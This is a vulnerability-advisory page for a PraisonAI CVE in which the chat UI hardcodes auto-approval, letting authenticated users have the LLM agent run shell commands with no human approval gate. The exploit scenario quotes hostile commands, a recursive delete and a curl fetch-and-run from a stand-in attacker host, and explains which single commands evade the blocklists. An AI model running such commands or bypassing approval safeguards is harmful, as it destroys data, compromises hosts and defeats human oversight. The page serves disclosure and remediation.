Skip to main content

PraisonAI CVE-2026-56075

| EUVDEUVD-2026-37959 HIGH
Incorrect Authorization (CWE-863)
2026-06-18 VulnCheck GHSA-gx4r-3wg8-9w5x
8.7
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

UI is network-reachable HTTP with low complexity; requires an authenticated UI account (PR:L); no user interaction; full RCE on host yields high C/I/A with unchanged scope.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Patch available
Jun 19, 2026 - 02:01 EUVD
Source Code Evidence Fetched
Jun 18, 2026 - 23:15 vuln.today
Analysis Generated
Jun 18, 2026 - 23:15 vuln.today

DescriptionCVE.org

PraisonAI before 4.5.128 contains an arbitrary shell command execution vulnerability where the UI modules hardcode approval_mode to auto, overriding administrator configuration from PRAISON_APPROVAL_MODE environment variable. Authenticated attackers can instruct the LLM agent to execute arbitrary shell commands via subprocess.run with shell=True, bypassing the manual approval gate and insufficient command sanitization blocklists.

AnalysisAI

Arbitrary shell command execution in PraisonAI before 4.5.128 allows authenticated UI users to bypass the human-in-the-loop approval gate because the Chainlit chat and code UI modules hardcode approval_mode='auto' after loading administrator config from PRAISON_APPROVAL_MODE. Once auto-approved, prompts to the LLM agent reach subprocess.run with shell=True, and the existing blocklists only filter command chaining operators - leaving single destructive commands (rm -rf, curl, dd, chmod) executable. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach PraisonAI Chainlit UI
Delivery
Authenticate (often default creds)
Exploit
Prompt LLM agent for shell action
Execution
ACP auto-approves plan (override)
Persist
subprocess.run executes single command
Impact
RCE as server user

Vulnerability AssessmentAI

Exploitation Requires a reachable PraisonAI Chainlit web UI started via 'praisonai ui chat' or 'praisonai ui code' (the underlying agent_tools/action_orchestrator code paths used from the CLI or SDK are not affected by the hardcoded override) and valid authenticated UI credentials (PR:L) - the GHSA PoC notes default credentials as a starting condition. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Authoritative signals weigh moderately high: CVSS 4.0 base 8.7 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H) reflects network-reachable, low-complexity, low-privilege RCE on the host running the UI. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who obtains or already holds credentials to a PraisonAI Chainlit UI (e.g., a default-credential or internally exposed instance) opens a chat session and instructs the agent in natural language to 'run rm -rf /home/praison' or 'fetch and run a payload with curl http://attacker.example/p.sh -o /tmp/p && /bin/sh /tmp/p' - the latter chained form is blocked, but the single-argument curl, wget, dd, or chmod variants pass both sanitizers. Because approval_mode is hardcoded to 'auto', the orchestrator approves the plan with no human prompt and subprocess.run executes it as the PraisonAI server process user, giving the attacker RCE on the host. …
Remediation Vendor-released patch: upgrade praisonai to 4.5.128 or later (pip install --upgrade praisonai), which restores honoring of the PRAISON_APPROVAL_MODE environment variable in the Chainlit UI modules; see GHSA-qwgj-rrpj-75xm. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Immediately inventory all PraisonAI deployments and document versions; restrict UI access to authorized administrators only; disable or isolate affected systems if running version before 4.5.128. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-61447 CRITICAL
10.0 Jul 11

Remote code execution in PraisonAI before 1.6.78 allows attackers to run arbitrary Python on the host by manipulating th

CVE-2026-61445 CRITICAL
9.4 Jul 11

Root-level command execution and arbitrary file write in PraisonAI's AICoder component (all versions before 4.6.78) let

CVE-2026-40157 CRITICAL
9.4 Apr 10

Path traversal in PraisonAI multi-agent teams system (versions prior to 4.5.128) enables arbitrary file overwrite throug

CVE-2026-61444 CRITICAL
9.4 Jul 10

Remote code execution in PraisonAI before 4.6.78 lets an attacker who can supply the agents_file parameter to deploy/api

CVE-2026-60090 CRITICAL
9.3 Jul 11

SQL/CQL injection in PraisonAI's PGVector and Cassandra knowledge-store backends before 4.6.78 allows a caller who contr

CVE-2026-40151 MEDIUM POC
5.3 Apr 09

PraisonAI AgentOS prior to version 4.5.128 exposes agent metadata including names, roles, and system instruction snippet

CVE-2026-40154 CRITICAL
9.3 Apr 09

Remote code execution in PraisonAI multi-agent framework (versions prior to 4.5.128) allows unauthenticated attackers to

CVE-2026-40289 CRITICAL
9.1 Apr 14

Unauthenticated remote session hijacking in PraisonAI's browser bridge (versions <4.5.139) and praisonaiagents (<1.5.140

CVE-2026-61426 HIGH
8.8 Jul 11

Unauthenticated agent access in PraisonAI before 1.7.3 lets remote attackers read agent instructions and system prompts

CVE-2026-61436 HIGH
8.8 Jul 15

Webhook signature-verification bypass in PraisonAI before 4.6.78 lets unauthenticated attackers forge Svix 'message.rece

CVE-2026-61435 HIGH
8.8 Jul 15

Authentication bypass in PraisonAI before 4.6.78 lets a remote, unauthenticated attacker reach the Call API agent-invoca

CVE-2026-61439 HIGH
8.7 Jul 11

System prompt extraction and unauthorized tool invocation in PraisonAI before 4.6.78 arise because the prompt-injection

Share

CVE-2026-56075 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy